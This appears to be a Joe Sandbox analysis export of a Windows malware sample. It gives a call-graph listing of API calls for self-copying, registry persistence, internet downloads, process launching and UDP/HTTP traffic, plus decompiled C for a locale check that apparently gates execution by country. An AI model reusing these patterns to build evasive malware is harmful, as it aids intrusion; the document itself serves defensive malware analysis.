40e2ed 5740->5745 5742 408fb0 __aligned_recalloc_base 3 API calls 5741->5742 5742->5744 5743 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5743->5745 5745->5743 5746 40e30b 5745->5746 5746->5741 5747 40b890 5752 40b830 5747->5752 5750 40b830 send 5751 40b8be 5750->5751 5753 40b841 send 5752->5753 5754 40b875 5753->5754 5755 40b85e 5753->5755 5754->5750 5754->5751 5755->5753 5755->5754 5756 40bc10 5757 409c30 4 API calls 5756->5757 5758 40bc23 5757->5758 5759 40bab0 129 API calls 
5758->5759 5760 40bc3a 5758->5760 5759->5760 5761 405a10 ExitThread 5762 404490 5763 40442b 5762->5763 5764 408fb0 __aligned_recalloc_base 3 API calls 5763->5764 5765 40449b LeaveCriticalSection 5764->5765 5415 4046dc 5418 4045dc 5415->5418 5416 4046d3 5417 4046fc 5416->5417 5419 4040f0 15 API calls 5416->5419 5420 408fb0 __aligned_recalloc_base 3 API calls 5417->5420 5418->5416 5421 408fb0 __aligned_recalloc_base 3 API calls 5418->5421 5419->5417 5422 40471d 5420->5422 5423 404632 5421->5423 5424 40472c CreateFileW 5422->5424 5425 4047be LeaveCriticalSection 5422->5425 5426 409020 8 API calls 5423->5426 5424->5425 5427 40474f 5424->5427 5428 404642 5426->5428 5431 4047aa FlushFileBuffers CloseHandle 5427->5431 5432 40476c WriteFile 5427->5432 5429 408fb0 __aligned_recalloc_base 3 API calls 5428->5429 5430 404669 5429->5430 5433 40ae60 7 API calls 5430->5433 5431->5425 5432->5427 5434 4046a0 5433->5434 5435 4058a0 10 API calls 5434->5435 5435->5416 5767 40de1f 5768 40dde0 5767->5768 5769 40de4b memmove 5768->5769 5770 40de5e 5768->5770 5769->5768 4250 405a20 Sleep 4251 405a48 4250->4251 4252 405a5a FindWindowA 4251->4252 4253 4061df CreateMutexA GetLastError 4251->4253 4252->4251 4256 405a7a Sleep MoveFileA MoveFileA FindWindowA 4252->4256 4254 406201 ExitProcess 4253->4254 4255 406209 GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 4253->4255 4265 406294 4255->4265 4257 405ac1 Sleep MoveFileA 4256->4257 4258 405adc Sleep 4256->4258 4257->4258 4259 405af3 4258->4259 4260 405b7a 9 API calls 4259->4260 4261 405b0e 8 API calls 4259->4261 4262 405c02 8 API calls 4260->4262 4263 405cf4 6 API calls 4260->4263 4261->4259 4268 405cdc InternetCloseHandle DeleteFileW 4262->4268 4292 405c7d 4262->4292 4269 405d79 7 API calls 4263->4269 4270 405fca 4263->4270 4264 406581 Sleep RegOpenKeyExA 4266 4065b2 8 API calls 4264->4266 4267 406698 RegOpenKeyExA 4264->4267 4265->4264 4334 40d4a0 GetLocaleInfoA 4265->4334 4266->4267 4272 4067a4 Sleep 
4267->4272 4273 4066be 8 API calls 4267->4273 4268->4263 4274 405df3 MoveFileW MoveFileW InternetOpenUrlA 4269->4274 4275 405e9b InternetCloseHandle Sleep 4269->4275 4280 406055 PathFileExistsA 4270->4280 4281 405fec FindWindowA 4270->4281 4342 40b4a0 4272->4342 4273->4272 4284 405e83 InternetCloseHandle Sleep 4274->4284 4285 405e3c 6 API calls 4274->4285 4275->4270 4277 405ec0 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 4275->4277 4286 405f18 InternetOpenUrlA 4277->4286 4287 405fbd InternetCloseHandle 4277->4287 4278 406333 ExpandEnvironmentStringsW wsprintfW CopyFileW 4288 406460 Sleep wsprintfW CopyFileW 4278->4288 4289 406387 SetFileAttributesW RegOpenKeyExW 4278->4289 4279 40632b ExitProcess 4293 406064 10 API calls 4280->4293 4294 4060d7 FindWindowA 4280->4294 4281->4270 4290 406008 Sleep DeleteFileW MoveFileW Sleep Sleep 4281->4290 4283 405ca4 MoveFileW Sleep MoveFileA Sleep 4283->4292 4284->4275 4285->4284 4295 405f41 MoveFileW Sleep DeleteFileW 4286->4295 4296 405f67 7 API calls 4286->4296 4287->4270 4288->4264 4301 4064a8 SetFileAttributesW RegOpenKeyExW 4288->4301 4297 406441 4289->4297 4298 4063bc RegSetValueExW RegCloseKey 4289->4298 4290->4270 4292->4268 4292->4283 4293->4294 4302 4060f3 10 API calls 4294->4302 4303 40616c 4294->4303 4295->4296 4296->4287 4336 40d740 memset CreateProcessW 4297->4336 4298->4297 4299 40690c 4300 4067bf 9 API calls 4345 404200 InitializeCriticalSection CreateFileW 4300->4345 4306 406562 4301->4306 4307 4064dd RegSetValueExW RegCloseKey 4301->4307 4302->4303 4303->4251 4309 406193 MoveFileW DeleteFileW Sleep MoveFileW 4303->4309 4308 40d740 5 API calls 4306->4308 4307->4306 4313 40656e 4308->4313 4309->4303 4313->4264 4317 406579 ExitProcess 4313->4317 4314 406458 ExitProcess 4320 406874 CreateEventA 4377 40abd0 4320->4377 4329 40bf50 17 API calls 4330 4068d4 4329->4330 4331 40bf50 17 API calls 4330->4331 4332 4068f0 4331->4332 4333 40bf50 17 API calls 4332->4333 4333->4299 4335 406323 4334->4335 
4335->4278 4335->4279 4337 40d7a0 Sleep 4336->4337 4338 40d7af ShellExecuteW 4336->4338 4341 40644d 4337->4341 4339 40d7e4 4338->4339 4340 40d7d5 Sleep 4338->4340 4339->4341 4340->4341 4341->4288 4341->4314 4422 40b470 4342->4422 4346 404325 4345->4346 4347 404238 CreateFileMappingW 4345->4347 4359 40d3d0 CoInitializeEx 4346->4359 4348 404259 MapViewOfFile 4347->4348 4349 40431b CloseHandle 4347->4349 4350 404311 CloseHandle 4348->4350 4351 404278 GetFileSize 4348->4351 4349->4346 4350->4349 4353 40428d 4351->4353 4352 404307 UnmapViewOfFile 4352->4350 4353->4352 4355 4042cc 4353->4355 4358 40429c 4353->4358 4551 40b4f0 4353->4551 4558 4040f0 4353->4558 4356 408fb0 __aligned_recalloc_base 3 API calls 4355->4356 4356->4358 4358->4352 4795 40c930 socket 4359->4795 4361 40d3f0 4362 40686f 4361->4362 4365 40d43a 4361->4365 4371 40d478 4361->4371 4805 40cfe0 4361->4805 4372 4057b0 CoInitializeEx SysAllocString 4362->4372 4820 409880 htons 4365->4820 4370 40d350 24 API calls 4370->4371 4839 4090d0 4371->4839 4373 4057d2 4372->4373 4374 4057e8 CoUninitialize 4372->4374 4984 405520 4373->4984 4374->4320 4993 40ab90 4377->4993 4380 40ab90 3 API calls 4381 40abee 4380->4381 4382 40ab90 3 API calls 4381->4382 4383 40abfe 4382->4383 4384 40ab90 3 API calls 4383->4384 4385 40688c 4384->4385 4386 40bea0 4385->4386 4387 408e40 7 API calls 4386->4387 4388 40beab 4387->4388 4389 406896 4388->4389 4390 40beb7 InitializeCriticalSection 4388->4390 4391 40a020 InitializeCriticalSection 4389->4391 4390->4389 4396 40a03a 4391->4396 4392 40a069 CreateFileW 4394 40a090 CreateFileMappingW 4392->4394 4395 40a152 4392->4395 4398 40a0b1 MapViewOfFile 4394->4398 4399 40a148 CloseHandle 4394->4399 5028 409a90 EnterCriticalSection 4395->5028 4396->4392 5000 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4396->5000 5001 409d70 4396->5001 4402 40a0cc GetFileSize 4398->4402 4403 40a13e CloseHandle 4398->4403 4399->4395 4401 40a157 4404 40bf50 17 API calls 4401->4404 4408 40a0eb 4402->4408 
4403->4399 4405 4068a0 4404->4405 4410 40bf50 4405->4410 4406 40a134 UnmapViewOfFile 4406->4403 4408->4406 4409 409d70 25 API calls 4408->4409 5027 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4408->5027 4409->4408 4411 40bf67 EnterCriticalSection 4410->4411 4412 4068b9 4410->4412 5048 40bed0 4411->5048 4412->4329 4415 40c02b LeaveCriticalSection 4415->4412 4416 408ea0 9 API calls 4417 40bfa9 4416->4417 4417->4415 4418 40bfbb CreateThread 4417->4418 4418->4415 4419 40bfde 4418->4419 4420 40c002 GetCurrentProcess GetCurrentProcess DuplicateHandle 4419->4420 4421 40c024 4419->4421 4420->4421 4421->4415 4425 40b410 4422->4425 4426 40b443 4425->4426 4427 40b42e 4425->4427 4429 4067b4 4426->4429 4457 40b240 4426->4457 4431 40b0c0 4427->4431 4429->4299 4429->4300 4432 40b172 4431->4432 4433 40b0e9 4431->4433 4436 408e40 7 API calls 4432->4436 4456 40b16a 4432->4456 4433->4456 4491 408e40 4433->4491 4437 40b198 4436->4437 4439 401000 7 API calls 4437->4439 4437->4456 4441 40b1c5 4439->4441 4443 4011e0 10 API calls 4441->4443 4445 40b1df 4443->4445 4444 40b13f 4446 401000 7 API calls 4444->4446 4447 401000 7 API calls 4445->4447 4448 40b150 4446->4448 4449 40b1f0 4447->4449 4450 4011e0 10 API calls 4448->4450 4451 4011e0 10 API calls 4449->4451 4450->4456 4452 40b20a 4451->4452 4453 401000 7 API calls 4452->4453 4454 40b21b 4453->4454 4455 4011e0 10 API calls 4454->4455 4455->4456 4456->4429 4458 40b269 4457->4458 4459 40b31a 4457->4459 4460 40b312 4458->4460 4461 408e40 7 API calls 4458->4461 4459->4460 4463 408e40 7 API calls 4459->4463 4460->4429 4462 40b27f 4461->4462 4462->4460 4465 401000 7 API calls 4462->4465 4464 40b33e 4463->4464 4464->4460 4467 401000 7 API calls 4464->4467 4466 40b2a3 4465->4466 4468 408e40 7 API calls 4466->4468 4469 40b362 4467->4469 4470 40b2b2 4468->4470 4471 408e40 7 API calls 4469->4471 4472 4011e0 10 API calls 4470->4472 4473 40b371 4471->4473 4474 40b2db 4472->4474 4475 4011e0 10 API calls 4473->4475 4476 408fb0 
__aligned_recalloc_base 3 API calls 4474->4476 4477 40b39a 4475->4477 4478 40b2e7 4476->4478 4479 408fb0 __aligned_recalloc_base 3 API calls 4477->4479 4480 401000 7 API calls 4478->4480 4481 40b3a6 4479->4481 4483 40b2f8 4480->4483 4482 401000 7 API calls 4481->4482 4484 40b3b7 4482->4484 4485 4011e0 10 API calls 4483->4485 4486 4011e0 10 API calls 4484->4486 4485->4460 4487 40b3d1 4486->4487 4488 401000 7 API calls 4487->4488 4489 40b3e2 4488->4489 4490 4011e0 10 API calls 4489->4490 4490->4460 4502 408da0 4491->4502 4494 401000 4523 408e60 4494->4523 4499 4011e0 4530 4010c0 4499->4530 4501 4011ff _invalid_parameter 4501->4444 4511 408b90 GetCurrentProcessId 4502->4511 4504 408dab 4507 408db7 __aligned_recalloc_base 4504->4507 4512 408d00 4504->4512 4506 408e2c 4506->4456 4506->4494 4507->4506 4508 408dd2 HeapAlloc 4507->4508 4508->4506 4509 408df9 __aligned_recalloc_base 4508->4509 4509->4506 4510 408e14 memset 4509->4510 4510->4506 4511->4504 4520 408b90 GetCurrentProcessId 4512->4520 4514 408d09 4515 408d26 HeapCreate 4514->4515 4521 408c70 GetProcessHeaps 4514->4521 4517 408d40 HeapSetInformation GetCurrentProcessId 4515->4517 4518 408d67 4515->4518 4517->4518 4518->4507 4520->4514 4522 408ca1 4521->4522 4522->4515 4522->4518 4524 408da0 __aligned_recalloc_base 7 API calls 4523->4524 4525 40100b 4524->4525 4526 401400 4525->4526 4527 40140a 4526->4527 4528 408e60 __aligned_recalloc_base 7 API calls 4527->4528 4529 401018 4528->4529 4529->4499 4531 40110e 4530->4531 4533 4010d1 4530->4533 4532 408e60 __aligned_recalloc_base 7 API calls 4531->4532 4531->4533 4535 401132 _invalid_parameter 4532->4535 4533->4501 4534 401162 memcpy 4536 401186 _invalid_parameter 4534->4536 4535->4534 4540 408fb0 4535->4540 4538 408fb0 __aligned_recalloc_base 3 API calls 4536->4538 4538->4533 4547 408b90 GetCurrentProcessId 4540->4547 4542 408fbb 4543 40115f 4542->4543 4548 408bb0 4542->4548 4543->4534 4546 408fd7 HeapFree 4546->4543 4547->4542 4549 408be0 HeapValidate 4548->4549 
4550 408c00 4548->4550 4549->4550 4550->4543 4550->4546 4567 409020 4551->4567 4556 408fb0 __aligned_recalloc_base 3 API calls 4557 40b531 4556->4557 4557->4353 4775 408ea0 4558->4775 4561 409020 8 API calls 4562 40415b 4561->4562 4785 40ae60 4562->4785 4565 4041e1 4565->4353 4568 40904d 4567->4568 4569 408e60 __aligned_recalloc_base 7 API calls 4568->4569 4570 409062 4568->4570 4571 409064 memcpy 4568->4571 4569->4568 4570->4557 4572 40aa00 4570->4572 4571->4568 4574 40aa0c 4572->4574 4576 40aa68 4574->4576 4578 408fb0 __aligned_recalloc_base 3 API calls 4574->4578 4579 40aa2b 4574->4579 4580 40af50 4574->4580 4594 406920 4574->4594 4577 408fb0 __aligned_recalloc_base 3 API calls 4576->4577 4577->4579 4578->4574 4579->4556 4579->4557 4581 40af5f __aligned_recalloc_base 4580->4581 4582 408e60 __aligned_recalloc_base 7 API calls 4581->4582 4593 40af69 4581->4593 4583 40aff8 4582->4583 4584 401000 7 API calls 4583->4584 4583->4593 4585 40b00d 4584->4585 4586 401000 7 API calls 4585->4586 4587 40b015 4586->4587 4589 40b06d __aligned_recalloc_base 4587->4589 4597 40aef0 4587->4597 4602 401050 4589->4602 4592 401050 3 API calls 4592->4593 4593->4574 4710 408b10 4594->4710 4598 4011e0 10 API calls 4597->4598 4599 40af04 4598->4599 4608 4013e0 4599->4608 4601 40af1c 4601->4587 4604 401064 _invalid_parameter 4602->4604 4605 4010ae 4602->4605 4603 408fb0 __aligned_recalloc_base 3 API calls 4603->4605 4606 408fb0 __aligned_recalloc_base 3 API calls 4604->4606 4607 40108c 4604->4607 4605->4592 4606->4607 4607->4603 4611 4012d0 4608->4611 4610 4013fa 4610->4601 4612 4012e4 4611->4612 4613 4010c0 __aligned_recalloc_base 10 API calls 4612->4613 4614 40132d 4613->4614 4615 4010c0 __aligned_recalloc_base 10 API calls 4614->4615 4616 40133d 4615->4616 4617 4010c0 __aligned_recalloc_base 10 API calls 4616->4617 4618 40134d 4617->4618 4619 4010c0 __aligned_recalloc_base 10 API calls 4618->4619 4620 40135d 4619->4620 4621 401366 4620->4621 4622 40138f 4620->4622 4626 402c20 4621->4626 
4643 4029d0 4622->4643 4625 401387 _invalid_parameter 4625->4610 4627 401400 _invalid_parameter 7 API calls 4626->4627 4628 402c37 4627->4628 4629 401400 _invalid_parameter 7 API calls 4628->4629 4630 402c46 4629->4630 4631 401400 _invalid_parameter 7 API calls 4630->4631 4632 402c55 4631->4632 4633 401400 _invalid_parameter 7 API calls 4632->4633 4642 402c64 _invalid_parameter 4633->4642 4635 402e0f _invalid_parameter 4636 401430 _invalid_parameter 3 API calls 4635->4636 4637 402e35 _invalid_parameter 4635->4637 4636->4635 4638 401430 _invalid_parameter 3 API calls 4637->4638 4639 402e5b _invalid_parameter 4637->4639 4638->4637 4640 401430 _invalid_parameter 3 API calls 4639->4640 4641 402e81 4639->4641 4640->4639 4641->4625 4642->4635 4646 401430 4642->4646 4650 402e90 4643->4650 4645 4029ec 4645->4625 4647 401446 4646->4647 4648 40143b 4646->4648 4647->4642 4649 408fb0 __aligned_recalloc_base 3 API calls 4648->4649 4649->4647 4651 402ea6 _invalid_parameter 4650->4651 4652 402eb8 _invalid_parameter 4651->4652 4653 402edd 4651->4653 4655 402f03 4651->4655 4652->4645 4680 402880 4653->4680 4656 402f3d 4655->4656 4657 402f5e 4655->4657 4690 402a00 4656->4690 4658 401400 _invalid_parameter 7 API calls 4657->4658 4660 402f6f 4658->4660 4661 401400 _invalid_parameter 7 API calls 4660->4661 4662 402f7e 4661->4662 4663 401400 _invalid_parameter 7 API calls 4662->4663 4664 402f8d 4663->4664 4665 401400 _invalid_parameter 7 API calls 4664->4665 4666 402f9c 4665->4666 4703 402950 4666->4703 4668 401400 _invalid_parameter 7 API calls 4669 402fca _invalid_parameter 4668->4669 4669->4668 4672 403084 _invalid_parameter 4669->4672 4670 401430 _invalid_parameter 3 API calls 4670->4672 4671 4033a3 _invalid_parameter 4673 401430 _invalid_parameter 3 API calls 4671->4673 4674 4033c9 _invalid_parameter 4671->4674 4672->4670 4672->4671 4673->4671 4675 401430 _invalid_parameter 3 API calls 4674->4675 4676 4033ef _invalid_parameter 4674->4676 4675->4674 4677 401430 _invalid_parameter 3 
API calls 4676->4677 4678 403415 _invalid_parameter 4676->4678 4677->4676 4678->4652 4679 401430 _invalid_parameter 3 API calls 4678->4679 4679->4678 4681 40288e 4680->4681 4682 401400 _invalid_parameter 7 API calls 4681->4682 4683 4028ab 4682->4683 4684 401400 _invalid_parameter 7 API calls 4683->4684 4685 4028ba _invalid_parameter 4684->4685 4686 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4685->4686 4687 40291a _invalid_parameter 4685->4687 4686->4685 4688 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4687->4688 4689 402940 4687->4689 4688->4687 4689->4652 4691 401400 _invalid_parameter 7 API calls 4690->4691 4692 402a17 4691->4692 4693 401400 _invalid_parameter 7 API calls 4692->4693 4694 402a26 4693->4694 4695 401400 _invalid_parameter 7 API calls 4694->4695 4702 402a35 _invalid_parameter 4695->4702 4696 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4696->4702 4697 402bc1 _invalid_parameter 4698 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4697->4698 4699 402be7 _invalid_parameter 4697->4699 4698->4697 4700 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4699->4700 4701 402c0d 4699->4701 4700->4699 4701->4652 4702->4696 4702->4697 4704 401400 _invalid_parameter 7 API calls 4703->4704 4705 40295f _invalid_parameter 4704->4705 4706 402880 _invalid_parameter 9 API calls 4705->4706 4707 402998 _invalid_parameter 4706->4707 4708 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4707->4708 4709 4029c3 4707->4709 4708->4707 4709->4669 4711 408b22 4710->4711 4714 408a70 4711->4714 4715 408e60 __aligned_recalloc_base 7 API calls 4714->4715 4720 408a80 4715->4720 4716 40693f 4716->4574 4718 408abc 4721 408fb0 __aligned_recalloc_base 3 API calls 4718->4721 4720->4716 4720->4718 4723 407fb0 4720->4723 4730 408590 4720->4730 4735 408960 4720->4735 4721->4716 4724 407fc3 4723->4724 4729 407fb9 4723->4729 4725 408006 memset 4724->4725 4724->4729 
4726 408027 4725->4726 4725->4729 4727 40802d memcpy 4726->4727 4726->4729 4743 407d80 4727->4743 4729->4720 4731 40859d 4730->4731 4732 4085a7 4730->4732 4731->4720 4732->4731 4733 40869f memcpy 4732->4733 4748 4082d0 4732->4748 4733->4732 4736 408976 4735->4736 4741 40896c 4735->4741 4737 4082d0 57 API calls 4736->4737 4736->4741 4738 4089f7 4737->4738 4739 407d80 6 API calls 4738->4739 4738->4741 4740 408a16 4739->4740 4740->4741 4742 408a2b memcpy 4740->4742 4741->4720 4742->4741 4744 407dce 4743->4744 4746 407d8e 4743->4746 4744->4729 4746->4744 4747 407cc0 6 API calls 4746->4747 4747->4746 4749 4082e1 4748->4749 4750 4082eb 4748->4750 4749->4732 4750->4749 4754 408110 4750->4754 4753 4082d0 57 API calls 4753->4749 4755 40811d 4754->4755 4756 408127 4754->4756 4755->4749 4755->4753 4756->4755 4757 4081b0 4756->4757 4758 4081b5 4756->4758 4759 408198 4756->4759 4765 407a70 4757->4765 4762 407d80 6 API calls 4758->4762 4761 407d80 6 API calls 4759->4761 4761->4757 4762->4757 4764 40825c memset 4764->4755 4766 407a89 4765->4766 4771 407a7f 4765->4771 4767 407950 6 API calls 4766->4767 4766->4771 4768 407b82 4767->4768 4769 408e60 __aligned_recalloc_base 7 API calls 4768->4769 4770 407bd1 4769->4770 4770->4771 4772 4077d0 44 API calls 4770->4772 4771->4755 4771->4764 4773 407bfe 4772->4773 4774 408fb0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4773->4774 4774->4771 4794 408b90 GetCurrentProcessId 4775->4794 4777 408eab 4778 408d00 __aligned_recalloc_base 5 API calls 4777->4778 4783 408eb7 __aligned_recalloc_base 4777->4783 4778->4783 4779 404117 4779->4561 4779->4565 4780 408bb0 __aligned_recalloc_base HeapValidate 4780->4783 4781 408f60 HeapAlloc 4781->4783 4782 408f2a HeapReAlloc 4782->4783 4783->4779 4783->4780 4783->4781 4783->4782 4784 408fb0 __aligned_recalloc_base 3 API calls 4783->4784 4784->4783 4788 40ae6b 4785->4788 4786 408e60 __aligned_recalloc_base 7 API calls 4786->4788 4787 4041a6 4787->4565 4789 4058a0 4787->4789 4788->4786 
4788->4787 4790 408e60 __aligned_recalloc_base 7 API calls 4789->4790 4791 4058b0 4790->4791 4792 4058f7 4791->4792 4793 4058bc memcpy CreateThread CloseHandle 4791->4793 4792->4565 4793->4792 4794->4777 4796 40c95d htons inet_addr setsockopt 4795->4796 4802 40ca8e 4795->4802 4797 409880 8 API calls 4796->4797 4798 40c9d6 bind lstrlenA sendto ioctlsocket 4797->4798 4803 40ca2b 4798->4803 4799 40ca52 4852 409940 shutdown closesocket 4799->4852 4802->4361 4803->4799 4804 408ea0 9 API calls 4803->4804 4843 40c840 4803->4843 4804->4803 4859 40c610 memset InternetCrackUrlA InternetOpenA 4805->4859 4808 40d0fe 4808->4361 4810 408fb0 __aligned_recalloc_base 3 API calls 4810->4808 4814 40d0cb 4814->4810 4817 40d0c1 SysFreeString 4817->4814 4966 409840 inet_addr 4820->4966 4823 40992d 4828 40d350 4823->4828 4824 4098dc connect 4825 4098f0 getsockname 4824->4825 4826 409924 4824->4826 4825->4826 4969 409940 shutdown closesocket 4826->4969 4970 409820 inet_ntoa 4828->4970 4830 40d366 4831 40b790 11 API calls 4830->4831 4832 40d385 4831->4832 4833 40d3c8 4832->4833 4971 40d110 memset InternetCrackUrlA InternetOpenA 4832->4971 4833->4370 4836 40d3bc 4837 408fb0 __aligned_recalloc_base 3 API calls 4836->4837 4837->4833 4838 408fb0 __aligned_recalloc_base 3 API calls 4838->4836 4842 4090d4 4839->4842 4840 4090da 4840->4362 4841 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 4841->4842 4842->4840 4842->4841 4851 40c85c 4843->4851 4844 40c924 4844->4803 4845 40c878 recvfrom 4846 40c8a6 StrCmpNIA 4845->4846 4847 40c899 Sleep 4845->4847 4848 40c8c5 StrStrIA 4846->4848 4846->4851 4847->4851 4849 40c8e6 StrChrA 4848->4849 4848->4851 4853 40b640 4849->4853 4851->4844 4851->4845 4852->4802 4857 40b64b 4853->4857 4854 40b651 lstrlenA 4856 40b664 4854->4856 4854->4857 4855 408e60 __aligned_recalloc_base 7 API calls 4855->4857 4856->4851 4857->4854 4857->4855 4857->4856 4858 40b680 memcpy 4857->4858 4858->4856 4858->4857 4860 40c6b1 InternetConnectA 4859->4860 4861 
40c827 4859->4861 4862 40c81a InternetCloseHandle 4860->4862 4863 40c6ea HttpOpenRequestA 4860->4863 4861->4808 4872 40c3b0 4861->4872 4862->4861 4864 40c720 HttpSendRequestA 4863->4864 4865 40c80d InternetCloseHandle 4863->4865 4866 40c800 InternetCloseHandle 4864->4866 4868 40c73d 4864->4868 4865->4862 4866->4865 4867 40c75e InternetReadFile 4867->4868 4869 40c78b 4867->4869 4868->4867 4868->4869 4870 408ea0 9 API calls 4868->4870 4869->4866 4871 40c7a6 memcpy 4870->4871 4871->4868 4901 40b570 4872->4901 4875 40c3da SysAllocString 4876 40c3f1 CoCreateInstance 4875->4876 4877 40c4a7 4875->4877 4878 40c49d SysFreeString 4876->4878 4881 40c416 4876->4881 4879 408fb0 __aligned_recalloc_base 3 API calls 4877->4879 4878->4877 4880 40c4b0 4879->4880 4880->4814 4882 40cf90 4880->4882 4881->4878 4918 40c4c0 4882->4918 4885 40ce70 4923 40cc90 4885->4923 4888 40cf19 4888->4817 4898 40b790 4888->4898 4891 40cdf0 6 API calls 4892 40cec7 4891->4892 4892->4888 4940 40cc10 4892->4940 4895 40cc10 6 API calls 4896 40ceff 4895->4896 4896->4888 4945 40c5b0 4896->4945 4961 40b700 4898->4961 4908 40b57d 4901->4908 4902 40b583 lstrlenA 4906 40b596 4902->4906 4902->4908 4904 408e60 __aligned_recalloc_base 7 API calls 4904->4908 4906->4875 4906->4880 4907 408fb0 __aligned_recalloc_base 3 API calls 4907->4908 4908->4902 4908->4904 4908->4906 4908->4907 4909 403b70 4908->4909 4913 403c40 4908->4913 4910 403b87 MultiByteToWideChar 4909->4910 4911 403b7a lstrlenA 4909->4911 4912 403bac 4910->4912 4911->4910 4912->4908 4914 403c4b 4913->4914 4915 403c51 lstrlenA 4914->4915 4916 403b70 2 API calls 4914->4916 4917 403c87 4914->4917 4915->4914 4916->4914 4917->4908 4919 40c4e6 4918->4919 4920 40c563 lstrcmpiW 4919->4920 4921 40c58b 4919->4921 4922 40c57b SysFreeString 4919->4922 4920->4919 4920->4922 4921->4814 4921->4885 4922->4919 4925 40ccb6 4923->4925 4924 40cdcd 4924->4888 4935 40cdf0 4924->4935 4925->4924 4926 40cd43 lstrcmpiW 4925->4926 4927 40cdc3 SysFreeString 4926->4927 4928 40cd56 
4926->4928 4927->4924 4929 40c5b0 2 API calls 4928->4929 4931 40cd64 4929->4931 4930 40cdb5 4930->4927 4931->4927 4931->4930 4932 40cd93 lstrcmpiW 4931->4932 4933 40cda5 4932->4933 4934 40cdab SysFreeString 4932->4934 4933->4934 4934->4930 4936 40c5b0 2 API calls 4935->4936 4938 40ce0b 4936->4938 4937 40ce47 4937->4888 4937->4891 4938->4937 4939 40cc90 6 API calls 4938->4939 4939->4937 4941 40c5b0 2 API calls 4940->4941 4943 40cc2b 4941->4943 4942 40cc67 4942->4895 4942->4896 4943->4942 4949 40cab0 4943->4949 4947 40c5d6 4945->4947 4946 40c5ed 4946->4888 4947->4946 4948 40c4c0 2 API calls 4947->4948 4948->4946 4951 40cad6 4949->4951 4950 40cbed 4950->4942 4951->4950 4952 40cb63 lstrcmpiW 4951->4952 4953 40cbe3 SysFreeString 4952->4953 4954 40cb76 4952->4954 4953->4950 4955 40c5b0 2 API calls 4954->4955 4957 40cb84 4955->4957 4956 40cbd5 4956->4953 4957->4953 4957->4956 4958 40cbb3 lstrcmpiW 4957->4958 4959 40cbc5 4958->4959 4960 40cbcb SysFreeString 4958->4960 4959->4960 4960->4956 4962 40b70d 4961->4962 4963 408ea0 9 API calls 4962->4963 4964 40b6b0 _vscprintf wvsprintfA 4962->4964 4965 40b728 SysFreeString 4962->4965 4963->4962 4964->4962 4965->4817 4967 40986c socket 4966->4967 4968 409859 gethostbyname 4966->4968 4967->4823 4967->4824 4968->4967 4969->4823 4970->4830 4972 40d341 4971->4972 4973 40d1b4 InternetConnectA 4971->4973 4972->4836 4972->4838 4974 40d334 InternetCloseHandle 4973->4974 4975 40d1ed HttpOpenRequestA 4973->4975 4974->4972 4976 40d223 HttpAddRequestHeadersA HttpSendRequestA 4975->4976 4977 40d327 InternetCloseHandle 4975->4977 4978 40d31a InternetCloseHandle 4976->4978 4981 40d26d 4976->4981 4977->4974 4978->4977 4979 40d284 InternetReadFile 4980 40d2b1 4979->4980 4979->4981 4980->4978 4981->4979 4981->4980 4982 408ea0 9 API calls 4981->4982 4983 40d2cc memcpy 4982->4983 4983->4981 4990 405557 4984->4990 4985 4054d0 CoCreateInstance 4985->4990 4986 40572b 4988 405734 SysFreeString 4986->4988 4989 40573e SysFreeString 4986->4989 4987 408fb0 

Control-flow Graph (graph image for E0040D4A0; legend: Executed / Not Executed)
C-Code - Quality: 92%
// Decompiler output. Reads the user's abbreviated country name
// (LOCALE_USER_DEFAULT = 0x400, LOCALE_SABBREVCTRYNAME = 7) into _v16 and
// compares it with the constant string at 0x410368, two bytes per iteration.
// Returns 1 when the strings match and 0 otherwise.
E0040D4A0() {
	char _v16;
	intOrPtr* _v20;
	intOrPtr* _v24;
	char _v25;
	char _v26;
	intOrPtr _v32;
	intOrPtr _v36;
	char _t26;
	char _t30;
	intOrPtr* _t34;
	intOrPtr* _t13; // used below but left undeclared by the decompiler

	GetLocaleInfoA(0x400, 7,  &_v16, 0xa); // executed
	_v20 = 0x410368;   // reference string in the image
	_v24 =  &_v16;     // locale string just retrieved
	while(1) {
		_t34 = _v24;
		_t26 =  *_t34;
		_v25 = _t26;
		if(_t26 !=  *_v20) {
			break;     // first byte differs: mismatch
		}
		if(_v25 == 0) {
			L5:
			_v32 = 0;  // both strings ended together: match
			L7:
			_v36 = _v32;
			if(_v36 != 0) {
				return 0;
			}
			return 1;
		}
		_t34 = _v24;
		_t30 =  *((intOrPtr*)(_t34 + 1));
		_v26 = _t30;
		_t13 = _v20 + 1; // 0x6f00524b
		if(_t30 !=  *_t13) {
			break;     // second byte differs: mismatch
		}
		_v24 = _v24 + 2;
		_v20 = _v20 + 2;
		if(_v26 != 0) {
			continue;
		}
		goto L5;
	}
	asm("sbb edx, edx");
	asm("sbb edx, 0xffffffff");
	_v32 = _t34;       // non-zero: strings differ
	goto L7;
}

APIs
• GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,?,?,?,?,?,00406323), ref: 0040D4B3
Memory Dump Source
• Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 611403d475bc268a560fb48b2f5e81d27d633618192b5c869a563e9a8d5f4499
